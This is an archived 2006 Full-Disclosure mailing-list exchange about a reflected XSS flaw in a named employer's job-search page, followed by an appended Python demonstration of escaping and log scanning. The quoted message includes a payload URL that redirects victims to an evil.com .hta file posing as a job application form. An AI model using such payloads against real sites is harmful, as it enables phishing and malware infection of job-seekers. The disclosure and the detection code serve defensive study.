Open Source and information security mailing list archives
Message-ID: <8dc64e550601220756g218669c7maeddb8a5e3240884@mail.gmail.com>
Date: Sun Jan 22 15:56:39 2006
From: native.code at gmail.com (Native.Code)
Subject: MBT Xss vulnerability

Nice discussion, guys. Perhaps I should have mentioned that XSS on every
site should not be posted to FD. And MBT does *not* attract millions of
job-seekers. It is an Indian employer, and IT job-seekers in India, at any
given time, should not be more than one million.

I believe most of the subscribers on this list did not need to know about this XSS.
It would have been better to report it to the IT team at MBT.

Best.


On 1/21/06, MuNNa <sant.jadhav@...il.com> wrote:
>
> Hi Bro,
>
> I got the point. You meant to say that XSS for each and every site should
> not be posted here, unless and until it attracts heavy traffic like Yahoo etc.
> I agree that MBT doesn't normally attract that amount of traffic, but
> you can target millions of users at one go.
> Like, say, there are many groups that post new job vacancies every day. So
> if I create a URL with JavaScript allowing you to download a file with, say,
> an .hta extension, and it claims to be some form that has to be filled in
> by the victim in order to apply for a job.
> For example: http://www.mahindrabt.com/jse/jsp/search.jsp?q=<script>
> document.location='www.evil.com/applicationform.hta'</script>
>
> If you post this URL in any of the above groups, you can be sure that your
> file will be downloaded by thousands of users. This is because MBT is one
> of the top employers. Believe me.
>
> Before someone downloads such files and gets his machine compromised, I
> just wanted to warn the users. As the number of victims could be large enough to
> create havoc, MBT's XSS vuln was of great concern to me. This is what made
> me post this vuln over here. Maybe I might have posted it in the wrong
> list. If this is the case, I am sorry to cause annoyance to you and others.
>
> Regards;
> Santosh J.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
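Added example, not code from the thread, from mahindrabt.com or from any project: a Python stand-in for a search page that reflects the `q` parameter, rendered once verbatim and once HTML-escaped, plus a scan over constructed access-log lines for the request shape quoted in the message above. The page template, the function names and the log lines are assumptions made for the example.

```python
import html
from urllib.parse import urlsplit, parse_qs


def _query_param(url: str, name: str = "q") -> str:
    """Return one query parameter; parse_qs already percent-decodes it."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_unsafe(url: str) -> str:
    """Hypothetical search page that reflects q verbatim (the bug class in the thread)."""
    return "<html><body><h1>Results for: " + _query_param(url) + "</h1></body></html>"


def render_safe(url: str) -> str:
    """Same page with q escaped for an HTML text context; the payload becomes inert text."""
    safe_q = html.escape(_query_param(url), quote=True)
    return "<html><body><h1>Results for: " + safe_q + "</h1></body></html>"


def reflected_script_tag(page: str) -> bool:
    """True when a literal <script tag survived into the rendered page."""
    return "<script" in page.lower()


# Request URL with the payload shape quoted in the thread (constructed; no server is contacted).
PAYLOAD_URL = ("http://www.mahindrabt.com/jse/jsp/search.jsp?q="
               "<script>document.location='www.evil.com/applicationform.hta'</script>")

# Constructed web-server access-log lines in Common Log Format; not real traffic.
ACCESS_LOG = [
    '10.0.0.5 - - [22/Jan/2006:15:56:39 +0000] "GET /jse/jsp/search.jsp?q=java+developer HTTP/1.1" 200 5120',
    '10.0.0.9 - - [22/Jan/2006:15:58:01 +0000] "GET /jse/jsp/search.jsp?q=%3Cscript%3E'
    'document.location%3D%27www.evil.com%2Fapplicationform.hta%27%3C%2Fscript%3E HTTP/1.1" 200 5201',
]


def suspicious_requests(lines):
    """Request targets whose decoded q carries markup or a location change: what the site's IT team could grep for."""
    hits = []
    for line in lines:
        path = line.split('"')[1].split(" ")[1]  # request line -> request target
        q = _query_param(path).lower()
        if "<script" in q or "document.location" in q:
            hits.append(path)
    return hits


if __name__ == "__main__":
    print("unsafe page reflects script tag:", reflected_script_tag(render_unsafe(PAYLOAD_URL)))
    print("escaped page reflects script tag:", reflected_script_tag(render_safe(PAYLOAD_URL)))
    print("suspicious requests:", suspicious_requests(ACCESS_LOG))
```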
